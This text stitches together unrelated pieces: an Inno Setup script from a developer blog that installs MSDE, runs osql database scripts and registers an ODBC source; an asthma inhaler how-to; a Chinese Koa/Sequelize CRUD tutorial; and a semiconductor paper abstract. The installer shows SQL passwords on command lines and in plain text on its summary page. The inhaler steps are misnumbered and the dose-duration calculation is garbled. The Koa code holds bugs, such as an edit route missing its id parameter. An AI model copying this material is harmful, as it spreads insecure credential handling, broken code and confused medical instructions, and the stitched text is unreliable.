{#AppName}}; Filename: {uninstallexe} [Files] ;************************************************************************************************ ; VB system files ;************************************************************************************************ ; see also ; http://support.microsoft.com/default.aspx?scid=kb;en-us;830761 ;************************************************************************************************ Source: vbfiles\stdole2.tlb; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile regtypelib Source: vbfiles\msvbvm60.dll; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile regserver Source: vbfiles\oleaut32.dll; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile regserver Source: vbfiles\olepro32.dll; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile regserver Source: vbfiles\asycfilt.dll; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile Source: vbfiles\comcat.dll; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile regserver ;************************************************************************************************ ; 3rd party DLL files ;************************************************************************************************ Source: projectfiles\somedll.DLL; DestDir: {app}; Flags: restartreplace sharedfile uninsnosharedfileprompt ;************************************************************************************************ ; MS DLL files ;************************************************************************************************ Source: system32\msstdfmt.dll; DestDir: {sys}; Flags: restartreplace sharedfile regserver Source: system32\msbind.dll; DestDir: {sys}; Flags: restartreplace sharedfile regserver Source: misc\dao360.dll; DestDir: {dao}; Flags: restartreplace sharedfile regserver Source: misc\sqlns.rll; DestDir: {pf}\Microsoft SQL Server\80\Tools\Binn\Resources\1033; Flags: restartreplace sharedfile ;************************************************************************************************ ; VB OCX files ;************************************************************************************************ Source: msocxs\COMCT332.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\MSCOMCT2.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\MSCOMCTL.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\TABCTL32.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\MSMASK32.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\MSDATGRD.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\COMDLG32.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\MSADODC.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall ;************************************************************************************************ ; 3rd party OCX files ;************************************************************************************************ Source: system32\someocx.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsnosharedfileprompt ;************************************************************************************************ ; project files ;************************************************************************************************ Source: projectfiles\{#AppName}.exe; DestDir: {app}; Flags: replacesameversion uninsnosharedfileprompt ;************************************************************************************************ ; MDAC ;************************************************************************************************ Source: MDAC\mdac_typ.exe; DestDir: {tmp}\mdac; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetNotInstallMSDEFlag ;************************************************************************************************ ; MSDE 2000 SP3a ;************************************************************************************************ Source: msde\*.*; DestDir: {tmp}\msde; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetInstallMSDEFlag Source: msde\msi\*.*; DestDir: {tmp}\msde\msi; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetInstallMSDEFlag Source: msde\msm\*.*; DestDir: {tmp}\msde\msm; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetInstallMSDEFlag Source: msde\msm\1033\*.*; DestDir: {tmp}\msde\msm\1033; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetInstallMSDEFlag Source: msde\setup\*.*; DestDir: {tmp}\msde\setup; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetInstallMSDEFlag ;************************************************************************************************ ; SQL scripts ;************************************************************************************************ Source: scripts\osql.exe; DestDir: {tmp}\scripts Source: scripts\buildobjects.sql; DestDir: {tmp}\scripts Source: scripts\createdatabase.sql; DestDir: {tmp}\scripts Source: scripts\populatedata.sql; DestDir: {tmp}\scripts [Run] ;************************************************************************************************ ; MSDE 2000 SP3a: ;************************************************************************************************ ; see also: ; http: //msdn.microsoft.com/library/default.asp?url=/library/en-us/distsql/distsql_84xl.asp ;************************************************************************************************ Filename: {tmp}\msde\Setup.exe; Parameters: SECURITYMODE=SQL INSTANCENAME={#DBInstance} SAPWD={#DBDefaultSaPassword}; WorkingDir: {tmp}\msde; MinVersion: {#MinVersion}; StatusMsg: Installing Microsoft Data Engine (MSDE); Check: GetInstallMSDEFlag Filename: {pf}\Microsoft SQL Server\80\Tools\Binn\scm.exe; Parameters: -Action 1 -Pwd {code:GetDbPassword} -Service MSSQL${#DBInstance} -Silent 1; WorkingDir: {pf}\Microsoft SQL Server\80\Tools\Binn; MinVersion: {#MinVersion}; StatusMsg: Starting Microsoft Data Engine (MSDE); Check: GetInstallMSDEFlag ;************************************************************************************************ ; MDAC 2.7 SP1 Refresh (WinXP) ;************************************************************************************************ ; see also: ; http://msdn.microsoft.com/library/default.asp?url=/library/en-us/mdacsdk/htm/wphistory_redistributemdac.asp ; http://support.microsoft.com/default.aspx?scid=kb;EN-US;842262 ;************************************************************************************************ Filename: {tmp}\mdac\mdac_typ.exe; Parameters: "/Q:A /C:""dasetup /Q:D /N"""; WorkingDir: {tmp}\mdac; MinVersion: {#MinVersion}; StatusMsg: Installing Microsoft Data Access Components (MDAC); Check: GetNotInstallMSDEFlag ;************************************************************************************************ ; SQL scripts ;************************************************************************************************ ; execute base SQL for new installations Filename: {tmp}\scripts\osql.exe; Parameters: -U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -dmaster -ocreatedatabase.log -r -e -i{tmp}\scripts\createdatabase.sql; WorkingDir: {tmp}\scripts; Flags: runhidden; Check: GetDatabaseNotExistsFlag; StatusMsg: Executing database scripts: create database Filename: {tmp}\scripts\osql.exe; Parameters: "-U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -dmaster -oaddlogin.log -r -e -Q""if not exists(SELECT * FROM master..syslogins WHERE name='{#DBAppUserName}') exec sp_addlogin '{#DBAppUserName}', '{#DBAppPassword}', '{#DBDatabase}';"""; WorkingDir: {tmp}\scripts; Flags: runhidden; StatusMsg: Executing database scripts: create application account Filename: {tmp}\scripts\osql.exe; Parameters: "-U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -d{#DBDatabase} -ograntdbaccess.log -r -e -Q""if not exists(SELECT * FROM sysusers WHERE name='{#DBAppUserName}') exec sp_grantdbaccess @loginame='{#DBAppUserName}';"""; WorkingDir: {tmp}\scripts; Flags: runhidden; StatusMsg: Executing database scripts: create application account Filename: {tmp}\scripts\osql.exe; Parameters: "-U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -d{#DBDatabase} -oaddrole.log -r -e -Q""exec sp_addrolemember @rolename='db_owner', @membername='{#DBAppUserName}';"""; WorkingDir: {tmp}\scripts; Flags: runhidden; StatusMsg: Executing database scripts: create application account Filename: {tmp}\scripts\osql.exe; Parameters: -U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -d{#DBDatabase} -obuildobjects.log -r -e -i{tmp}\scripts\buildobjects.sql; WorkingDir: {tmp}\scripts; Flags: runhidden; Check: GetDatabaseNotExistsFlag; StatusMsg: Executing database scripts: create objects Filename: {tmp}\scripts\osql.exe; Parameters: -U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -d{#DBDatabase} -opopulatedata.log -r -e -i{tmp}\scripts\populatedata.sql; WorkingDir: {tmp}\scripts; Flags: runhidden; Check: GetDatabaseNotExistsFlag; StatusMsg: Executing database scripts: populate data ; TODO: execute update SQL for this version ; update database version value Filename: {tmp}\scripts\osql.exe; Parameters: "-U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -d{#DBDatabase} -odel_DatabaseVersion.log -r -e -Q""DELETE FROM {#DBDatabase}..DatabaseVersion"""; WorkingDir: {tmp}\scripts; Flags: runhidden; StatusMsg: Executing database scripts: update version Filename: {tmp}\scripts\osql.exe; Parameters: "-U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -d{#DBDatabase} -oins_DatabaseVersion.log -r -e -Q""INSERT INTO {#DBDatabase}..DatabaseVersion (DatabaseVersionID, CurrentVersion) VALUES (1, '{#Ver1}.{#Ver2}.{#Ver3}.{#Ver4}')"""; WorkingDir: {tmp}\scripts; Flags: runhidden; StatusMsg: Executing database scripts: update version [Registry] Root: HKLM; SubKey: Software\ODBC\ODBC.INI\ODBC Data Sources; Flags: createvalueifdoesntexist uninsdeletevalue deletevalue; ValueName: {#DBDSN}; ValueType: string; ValueData: SQL Server Root: HKLM; SubKey: Software\ODBC\ODBC.INI\{#DBDSN}; Flags: createvalueifdoesntexist uninsdeletevalue deletevalue; ValueName: Driver; ValueType: string; ValueData: {sys}\SQLSRV32.dll Root: HKLM; SubKey: Software\ODBC\ODBC.INI\{#DBDSN}; Flags: createvalueifdoesntexist uninsdeletevalue deletevalue; ValueName: Server; ValueType: string; ValueData: {code:GetDbServer} Root: HKLM; SubKey: Software\ODBC\ODBC.INI\{#DBDSN}; Flags: createvalueifdoesntexist uninsdeletevalue deletevalue; ValueName: Database; ValueType: string; ValueData: {#DBDatabase} Root: HKLM; SubKey: Software\ODBC\ODBC.INI\{#DBDSN}; Flags: createvalueifdoesntexist uninsdeletevalue deletevalue; ValueName: Description; ValueType: string; ValueData: {#DBDSNDescription} [INI] [CustomMessages] databaseInfoCaption=Database information databaseInfoDescription=Please indicate the database information [Code] var Label1: TLabel; Label2: TLabel; Label3: TLabel; txtServer: TEdit; rbInstallMSDE: TRadioButton; rbUseExisting: TRadioButton; txtLogin: TEdit; txtPassword: TEdit; _installMSDE: boolean; // installing MSDE locally or using existing SQL instance dbExists: boolean; // installing to new or existing database dbServer: String; // use existing SQL Server server name dbLogin: String; // use existing SQL Server login dbPassword: String; // use existing SQL Server password //************************************************************************************************ // EVENT HANDLERS //************************************************************************************************ procedure databaseInfo_Activate(Page: TWizardPage); begin end; procedure databaseInfo_CancelButtonClick(Page: TWizardPage; var Cancel, Confirm: Boolean); begin end; procedure rbUseExisting_Click(Sender: TObject); begin // enable entry fields txtServer.Enabled := True; txtServer.ReadOnly := False; txtLogin.Enabled := True; txtLogin.ReadOnly := False; txtPassword.Enabled := True; txtPassword.ReadOnly := False; end; procedure rbInstallMSDE_Click(Sender: TObject); begin // disable entry fields txtServer.Enabled := False txtServer.ReadOnly := True; txtLogin.Enabled := False; txtLogin.ReadOnly := True; txtPassword.Enabled := False; txtPassword.ReadOnly := True; end; //************************************************************************************************ // FUNCTIONS //************************************************************************************************ function InitializeSetup(): Boolean; begin // extract OSQL.exe file...needed in databaseInfo_NextButtonClick() ExtractTemporaryFile('osql.exe'); Result := True; end; procedure DeInitializeSetup(); begin end; function GetInstallMSDEFlag: Boolean; begin Result := _installMSDE; end; function GetNotInstallMSDEFlag: Boolean; begin Result := not _installMSDE; // coded this way to accommodate the Check values end; function GetDatabaseExistsFlag: Boolean; begin Result := dbExists; end; function GetDatabaseNotExistsFlag: Boolean; begin Result := not dbExists; // coded this way to accommodate the Check values end; function GetDbServer(Default:String): String; begin Result := dbServer; end; function GetDbLogin(Default:String): String; begin Result := dbLogin; end; function GetDbPassword(Default:String): String; begin Result := dbPassword; end; function GetDbInstallType(Default:String): String; begin if (_installMSDE) then Result := 'Local' else Result := 'Remote'; end; // returns a string given a boolean and 2 representative return strings function BoolToStr(b:boolean; TrueValue:string; FalseValue:string) : String; begin if b then Result:=TrueValue else Result:=FalseValue; end; // output pre-installation stats function UpdateReadyMemo(Space, NewLine, MemoUserInfoInfo, MemoDirInfo, MemoTypeInfo, MemoComponentsInfo, MemoGroupInfo, MemoTasksInfo: String): String; var cTemp: String; DatabaseInfo: String; begin // create database information DatabaseInfo := 'Database information:' + NewLine; if (_installMSDE) then begin DatabaseInfo := DatabaseInfo + CHR(9) + 'Install MSDE locally' + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Server: ' + dbServer + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Login: ' + dbLogin + NewLine; // DatabaseInfo := DatabaseInfo + CHR(9) + 'Password: *****' + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Password: ' + dbPassword + NewLine; end else begin DatabaseInfo := DatabaseInfo + CHR(9) + 'Use existing SQL Server' + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Server: ' + dbServer + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Login: ' + dbLogin + NewLine; // DatabaseInfo := DatabaseInfo + CHR(9) + 'Password: *****' + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Password: ' + dbPassword + NewLine; end; cTemp := MemoUserInfoInfo + NewLine + NewLine; cTemp := cTemp + MemoDirInfo + NewLine + NewLine; cTemp := cTemp + DatabaseInfo + NewLine + NewLine; Result := cTemp; end; function databaseInfo_ShouldSkipPage(Page: TWizardPage): Boolean; begin Result := False; end; function databaseInfo_BackButtonClick(Page: TWizardPage): Boolean; begin Result := True; end; // executes upon clicking Next within database info dialog function databaseInfo_NextButtonClick(Page: TWizardPage): Boolean; var ResultCode: Integer; output: String; begin // initialize _installMSDE := False; dbExists := False; // install MSDE ok if (rbInstallMSDE.Checked) then begin _installMSDE := True; // MAY be overriden in the logic below dbServer := '{#DBDefaultServer}\{#DBInstance}'; dbLogin := '{#DBDefaultSaAccount}'; dbPassword := '{#DBDefaultSaPassword}'; Result := True; end else begin // ensure all fields provided if use existing selected if ((rbUseExisting.Checked) and ((txtServer.Text = '') or (txtLogin.Text = '') or (txtPassword.Text = ''))) then begin MsgBox('You must provide server, login, and password for an existing installation.', mberror, MB_OK); Result := False; end else begin // persist entered values dbServer := txtServer.Text; dbLogin := txtLogin.Text; dbPassword := txtPassword.Text; _installMSDE := False; Result := True; end end; // output check for existing database message MsgBox ('Setup will now determine if the database exists. This may take up to 30 seconds.', mbInformation, MB_OK); // determine if instance/database exist if Exec(ExpandConstant('{tmp}\osql.exe'), '-U' + dbLogin + ' -P' + dbPassword + ' -S' + dbServer + ' -l10 -odatabaseexists.log -Q"EXIT(SELECT COUNT(*) FROM master..sysdatabases WHERE name=''{#DBDatabase}'')"', '', SW_HIDE, ewWaitUntilTerminated, ResultCode) then begin // read in the OSQL output file 0 if not exists, 1 if exists --> MUST LOOK FOR '0' FIRST because file returns 1 record(s) affected if LoadStringFromFile(ExpandConstant('{tmp}\databaseexists.log'), output) then begin if Pos(ExpandConstant(IntToStr(0)), output)>0 then begin if (_installMSDE) then begin // Delete any stragler crgp .mdf and .ldf files but leave the directory itself DelTree(ExpandConstant('{pf}\Microsoft SQL Server\MSSQL${#DBInstance}\Data\{#DBDatabase}*'), False, True, True); DelTree(ExpandConstant('{pf}\Microsoft SQL Server\MSSQL${#DBInstance}\Data\' + Lowercase(ExpandConstant('{#DBDatabase}')) + '*'), False, True, True); // database does not exist but instance does; user indicated install MSDE; else user indicated use existing SQL Server MsgBox ('The database does not yet exist and will be created during installation. Original system account and password is assumed. Click back and choose existing SQL Server if this is incorrect.', mbInformation, MB_OK); _installMSDE := False; end else MsgBox ('The database does not yet exist and will be created during installation using the credentials supplied.', mbInformation, MB_OK); end else begin if Pos(ExpandConstant(IntToStr(1)), output)>0 then begin if (_installMSDE) then begin // database and instance exist; user indicated install MSDE; else user indicated use existing SQL Server // should never hit this but coded it anyway just in case MsgBox ('The database exists and will undergo an upgrade during installation. Original system account and password is assumed. Click back and choose existing SQL Server if this is incorrect.', mbInformation, MB_OK); _installMSDE := False; end else MsgBox ('The database exists and will undergo an upgrade during installation using the credentials supplied.', mbInformation, MB_OK); dbExists := True; _installMSDE := False; end else begin if Pos('Login failed for user', output)>0 then begin // credentials incorrect MsgBox ('Incorrect login credentials.', mbInformation, MB_OK); Result := False; end else begin if Pos('SQL Server does not exist', output)>0 then begin // server does not exist if not _installMSDE then begin MsgBox ('SQL Server does not exist. Try re-entering the information.', mbInformation, MB_OK); Result := False; end else begin // Delete any stragler crgp .mdf and .ldf files but leave the directory itself DelTree(ExpandConstant('{pf}\Microsoft SQL Server\MSSQL${#DBInstance}\Data\{#DBDatabase}*'), False, True, True); DelTree(ExpandConstant('{pf}\Microsoft SQL Server\MSSQL${#DBInstance}\Data\' + Lowercase(ExpandConstant('{#DBDatabase}')) + '*'), False, True, True); MsgBox ('MSDE will be installed locally. Afterward, a reboot may be required (select yes if prompted).', mbInformation, MB_OK); Result := True; _installMSDE := True; end end end end end end end; end; function databaseInfo_CreatePage(PreviousPageId: Integer): Integer; var Page: TWizardPage; begin Page := CreateCustomPage( PreviousPageId, ExpandConstant('{cm:databaseInfoCaption}'), ExpandConstant('{cm:databaseInfoDescription}') ); { Label1 } Label1 := TLabel.Create(Page); with Label1 do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(56); Width := ScaleX(58); Height := ScaleY(13); Caption := 'SQL Server:'; end; { Label2 } Label2 := TLabel.Create(Page); with Label2 do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(104); Width := ScaleX(58); Height := ScaleY(13); Caption := 'Login name:'; end; { Label3 } Label3 := TLabel.Create(Page); with Label3 do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(152); Width := ScaleX(50); Height := ScaleY(13); Caption := 'Password:'; end; { rbInstallMSDE } rbInstallMSDE := TRadioButton.Create(Page); with rbInstallMSDE do begin Parent := Page.Surface; Left := ScaleX(0); Top := ScaleY(8); Width := ScaleX(361); Height := ScaleY(17); Caption := 'Install Microsoft SQL Server Database Engine (MSDE) locally'; TabOrder := 1; Checked := True; ONCLICK := @rbInstallMSDE_Click; end; { rbUseExisting } rbUseExisting := TRadioButton.Create(Page); with rbUseExisting do begin Parent := Page.Surface; Left := ScaleX(0); Top := ScaleY(32); Width := ScaleX(401); Height := ScaleY(17); Caption := 'Use existing SQL Server installation. Account must have administrative rights.'; TabOrder := 2; TabStop := True; ONCLICK := @rbUseExisting_Click; end; { txtServer } txtServer := TEdit.Create(Page); with txtServer do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(72); Width := ScaleX(257); Height := ScaleY(21); Enabled := False; ReadOnly := True; TabOrder := 3; end; { txtLogin } txtLogin := TEdit.Create(Page); with txtLogin do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(120); Width := ScaleX(257); Height := ScaleY(21); Enabled := False; ReadOnly := True; TabOrder := 4; end; { txtPassword } txtPassword := TEdit.Create(Page); with txtPassword do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(168); Width := ScaleX(257); Height := ScaleY(21); Enabled := False; ReadOnly := True; TabOrder := 5; end; with Page do begin OnActivate := @databaseInfo_Activate; OnShouldSkipPage := @databaseInfo_ShouldSkipPage; OnBackButtonClick := @databaseInfo_BackButtonClick; OnNextButtonClick := @databaseInfo_NextButtonClick; OnCancelButtonClick := @databaseInfo_CancelButtonClick; end; Result := Page.ID; end; //************************************************************************************************ // PROCEDURES //************************************************************************************************ procedure InitializeWizard(); begin // display custom database page after selecting directory databaseInfo_CreatePage(wpSelectDir); end; Comments Anonymous said… can i have a full examples pls Jeff Hunsaker said… Ha, that's funny. Oh, you're not joking. That is a full example. Anonymous said… i mean all main files and sub folders pealse. thanks Jeff Hunsaker said… Just add the files desired for install to the [Files] section. Popular posts from this blog Get Your Team Foundation Server Hate On! [Google ranking skyrockets... ;-)] I'm a big fan of TFS/VSTS. However, there are a good pocket of folks who take issue with the way TFS handles or implements a certain feature. Well this is your chance to vent! I'm planning a presentation around the "Top 10 TFS/VSTS Hates and How to Alleviate Them"...or something along those lines. But I need your help. Post a comment below detailing your dislike. If it's legitimate, I'll highlight it in the presentation and [hopefully] provide an alternative, resolution, or work-around. Thanks in advance! Update 7/19/2008: Version Control and Microsoft Rollback a Ooops in TFS with TFPT Rollback Rhut roe, Raggie. You just checked in a merge operation affecting 100's of files in TFS against the wrong branch. Ooops. Well, you can simply roll it back, right? Select the folder in Source Control Explorer and...hey, where's the Rollback? Rollback isn't supported in TFS natively. However, it is supported within the Power Tools leveraging the command-line TFPT.exe utility. It's fairly straightforward to revert back to a previous version--with one caveot. First, download and install the Team Foundation Power Tools 2008 on your workstation. Before proceeding, let's create a workspace dedicated to the rollback. To "true up" the workspace, the rollback operation will peform a Get Latest for every file in your current workspace. This can consume hours (and many GB) with a broad workspace mapping. To work around this, I create a temporary workspace targeted at just the area of source I need to roll back. So let's drill down on our scenario... I'm worki Configuring a Development Sandbox for the Azure CTP I'm getting up to speed on Azure and the other cloud SDKs and need to configure an environment for development, demos and learning. My experiences... First off, if you've read my blog, you know I haven't installed non-productivity software on my core OS for years . Further, I don't get the warm and fuzzies installing CTP software on my core OS. I also love the recoverability and start-over-from-a-checkpoint features of virtualization. Virtual PC (VPC) houses all my development, demo and learning sandbox instances. So, let's start off with a VPC instance. For this to work well, ideally, you need a good 4GB of memory. Further to the ideal, you're running x64 so as to have access to the full 4GB of memory. ACQUIRE AN AZURE SERVICES DEVELOPER KEY To develop against Azure and/or .Net Services and SQL Services, you need an invitation code. Oooh, very exclusive. Pretty people to the front of the line! You can start the process here . If you run into problems, che
__label__pos
0.915971
Breath Actuated Metered Dose Inhaler Woman using Asthma inhaler in garden MDI for Asthma. Tim Robberts / Getty Images A breath actuated metered dose inhaler (MDI) is a type of inhaler that delivers asthma medication to your lungs. With this type of MDI, the medication is driven into your lungs during inhalation instead of via a propellant, as is the case with other MDIs. When using a breath attenuated metered dose inhaler, proper technique is important, as improper use leads to less medication being delivered to your lungs. Use Some MDIs require priming or the spraying of one or several puffs when the inhaler is new or has not been used for a certain period of time. This requirement varies among devices. Check with your doctor or refer to the package insert for specific instructions. It is also a good idea to review inhaler technique with your doctor, asthma educator, or pharmacy for general and product-specific instructions related to your MDI technique. 1. Remove the cap from the mouthpiece and shake for five seconds. Failing to shake prior to use leads to unreliable dosing when the medication is released. 2. Hold the inhaler upright and lift lever. See the previously mentioned info about priming. This step is where priming would be performed if necessary. 3. Breathe out completely away from the spacer You want your chin slightly elevated as you begin to inhale. 4. Put the mouthpiece in your mouth and seal your lips around it tightly. 1. Begin to breathe in slowly through your mouth for about 5 seconds. As you breathe in the MDI will release a puff of medicine. 2. Fill your lungs as completely as possible. Count to 10 slowly while holding your breath. 3. Slowly exhale. 4. Close lever. 5. Repeat steps 3 to 8 the number of times necessary to get your appropriate dose. Your inhaler will last for several months, so it is important that it remains in good working order. Expiration Look on your MDI canister or package insert to see how many doses are contained in your MDI. In order to determine exactly how long your inhaler will last, you need to determine how many doses you will use per day and then divide by the total number of doses in the inhaler. For example, if your MDI contains 200 doses and you take one puff twice daily, that means you will use two doses per day. Dividing 200 by two equals 100, so your MDI should last for 100 days. When you have used the total doses make sure to dispose of the MDI. It may feel as though there is still medication in the canister, but this is most likely a chemical additive or leftover propellant. Make sure to call your doctor’s office or the pharmacy for a refill before you run out of medicine. Source: National Heart, Lung, and Blood Institute. An Expert Panel Report 3 (EPR3): Guidelines for the Diagnosis and Management of Asthma.
__label__pos
0.78075
這是在講關於一名叫 Koa 的全端勇士傳說-MySQL篇-sequelize(4) 前言 前面已經學習了如何查詢資料並打印在前端畫面上,接下來就是將表單資料 post 之後新增到資料庫內 新增資料 接下來 ejs 表單部分要操作調整一下 1 2 3 4 5 6 7 <form action="/post" method="post"> <input type="hidden" name="_csrf" value="<%= csrf %>"/> <input type="email" name="email" id="email"> <input type="text" name="firstname" id="firstname"> <input type="text" name="lastname" id="lastname"> <input type="submit" value="送出"> </form> 然後在來就要修改 post router,這邊會使用到的方法是 create,所以程式碼就會像這樣子 1 2 3 4 5 6 7 8 9 router.post('/post', csrfMD ,async (ctx, next) => { var modelDate = { firstName: ctx.request.body.firstname, lastName: ctx.request.body.lastname, createdAt: new Date(), }; await models.User.create(modelDate); await ctx.redirect('/'); }) 當我們輸入表單 輸入表單 送出之後就可以在資料庫看到資料新增上去了 資料新增 修改資料 接下來就是修改資料,但是這邊我必須做一些 EJS 的調整,這樣子才可以跟後端說我要撈取哪一筆準備更新的資料 1 2 3 4 5 <ul> <% for(item in user) {%> <li> ID:<%- user[item].dataValues.id%> / 姓名:<%- user[item].dataValues.firstName%> - <a href="/edit/<%- user[item].dataValues.id %>">編輯</a></a></li> <% } %> </ul> 由於我們要透過 edit/:id 來取得要更新的資料,所以就要在新增一個頁面以及 router,那 EJS 部分我就不提供了,因為很簡單,這邊就只講 router 部分 首先我們是透過 params 傳參數的方式,所以會使用到 ctx.params 的方法來取的參數 1 2 3 4 5 6 7 router.get('/edit', csrfMD ,async (ctx, next) => { console.log(ctx.params.id) await ctx.render('edit', { title: '更新資料', csrf: ctx.csrf, }) }) 傳參數 那個接下來就要透過使用 sequelize 的 findOne() 來尋找資料哩 1 2 3 4 5 models.User.findOne({ where: { id: ctx.params.id } }).then((result) => { console.log(result); }) 那麼就可以得到我們要找的資料 findOne 接下來就是將資料傳到欄位內,所以這邊的 router 最終就會變成這樣 1 2 3 4 5 6 7 8 9 10 11 .get('/edit', csrfMD ,async (ctx, next) => { await models.User.findOne({ where: { id: ctx.params.id } }).then(async (result) => { await ctx.render('edit', { title: '更新資料', csrf: ctx.csrf, user: result.dataValue }) }) }) 而 EJS 部分則會是這樣 1 2 3 4 5 6 7 <form action="/post" method="post"> <input type="hidden" name="_csrf" value="<%= csrf %>"/> <input type="email" name="email" id="email" value="<%- user.email %>"> <input type="text" name="lastname" id="lastname" value="<%- user.lastName %>"> <input type="text" name="firstname" id="firstname" value="<%- user.firstName %>"> <input type="submit" value="送出"> </form> 拉出來的結果如下 查詢結果 那麼我們這邊還需要新增一個 router 也就是 post,是要接收更新的資料的 1 2 3 4 5 6 7 8 9 10 11 12 13 router.post('/edit/:id', csrfMD, async (ctx, next) => { await models.User.update( { firstName: ctx.request.body.firstname, lastName: ctx.request.body.lastname, updatedAt: new Date(), }, { where: { id: ctx.params.id } }).then(async (result) => { await ctx.redirect('/'); }) }) 接下來我們就直接來修改資料吧,原本資料是這樣 資料新增 那我預計修改成這樣 預計修改 當我們送出表單後,就可以看到資料更新哩~ 資料更新成功 刪除資料 接下來要講的是比較危險的動作,也就是資料刪除,這個動作如果一個不小心是會導致資料無法復原,所以在這邊通常建議一定要做二次提醒唷~ 首先先新增一個 delete router,這邊會使用到 destroy 方法,由於一般都會透過 AJAX 1 2 3 4 5 6 7 8 9 .delete('/delete/:id', csrfMD, async (ctx, next) => { await models.User.destroy( { where: { id: ctx.params.id } }).then(async (result) => { console.log('刪除成功'); await ctx.redirect('/'); }) }) 那麼 EJS 部分就透過 AJAX 方式來傳送,所以 EJS 部分要稍微調整一下 1 2 3 4 5 <ul id="content"> <% for(item in user) {%> <li> ID:<%- user[item].dataValues.id%> / 姓名:<%- user[item].dataValues.firstName%> - <a href="/edit/<%- user[item].dataValues.id %>">編輯</a> - <a href="#" data-id="<%- user[item].dataValues.id %>">刪除</a></li> <% } %> </ul> 調整完結果就會像這樣子 EJS 接下來就是撰寫 JavaScript 啦~ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 const contentId = document.querySelector('#content'); contentId.addEventListener('click',(e) => { if(e.target.nodeName === 'A') { if(confirm('你確定要刪除該筆資料?')) { fetch(`/delete/${e.target.dataset.id}`,{ method: 'delete' }).then((respons) => { return respons.json() }).then((respons)=> { console.log(respons) }).catch((error) => { console.log(error); }) } } }); 接下來就是 router 部分 1 2 3 4 5 6 7 8 9 10 11 12 .delete('/delete/:id', async (ctx, next) => { await models.User.destroy( { where: { id: ctx.params.id } }).then(async () => { console.log('刪除成功'); ctx.body = {errmsg:'ok',errcode:0}; }) ctx.body = { errmsg:'ok',errcode:0 }; }) 最後就可以實際來刪除看看哩~ (我已經先刪除一個 ID 1 了,這邊來測試刪除 ID 3) ID 3 確定要刪除? 刪除成功後資料庫就會刪除這筆資料了 刪除成功 補充 這邊有幾個地方必須注意 • 新增資料與更新資料時欄位必須相同,否則會出錯 • 在 express 是使用 req.send() 回傳 AJAX 訊息,但在 koa 是使用 ctx.body Liker 讚賞 (拍手) 如果這一篇筆記文章對你有幫助,希望可以求點支持或 牡蠣 鼓勵 (ノД`)・゜・。 Liker 是一個按讚(拍手)的讚賞機制,每一篇文章最多可以按五下拍手,過程你只需要登入,如果你願意按個讚,對於創作者來講是一個莫大的鼓勵與支持。 Google AD 撰寫一篇文章其實真的很花時間,如果你願意「關閉 Adblock (廣告阻擋器)」來支持我的話,我會非常感謝你 ヽ(・∀・)ノ
__label__pos
0.990295
skip to main content DOE PAGESDOE PAGES Title: Probing interfacial energetics and charge transfer kinetics in semiconductor nanocomposites: New insights into heterostructured TiO 2/BiVO 4 photoanodes Heterostructured nanocomposites offer promise for creating systems exhibiting functional properties that exceed those of the isolated components. For solar energy conversion, such combinations of semiconducting nanomaterials can be used to direct charge transfer along pathways that reduce recombination and promote efficient charge extraction. However, interfacial energetics and associated kinetic pathways often differ significantly from predictions derived from the characteristics of pure component materials, particularly at the nanoscale. Here, the emergent properties of TiO 2/BiVO 4 nanocomposite photoanodes are explored using a combination of X-ray and optical spectroscopies, together with photoelectrochemical (PEC) characterization. Application of these methods to both the pure components and the fully assembled nanocomposites reveals unpredicted interfacial energetic alignment, which promotes ultrafast injection of electrons from BiVO 4 into TiO 2. Physical charge separation yields extremely long-lived photoexcited states and correspondingly enhanced photoelectrochemical functionality. This work highlights the importance of probing emergent interfacial energetic alignment and kinetic processes for understanding mechanisms of solar energy conversion in complex nanocomposites. Authors:  [1] ;  [1] ;  [2] ;  [1] ;  [2] ;  [1] 1. Lawrence Berkeley National Lab. (LBNL), Berkeley, CA (United States) 2. Ecole Polytechnique Federale de Lausanne, Sion (Switzerland) Publication Date: 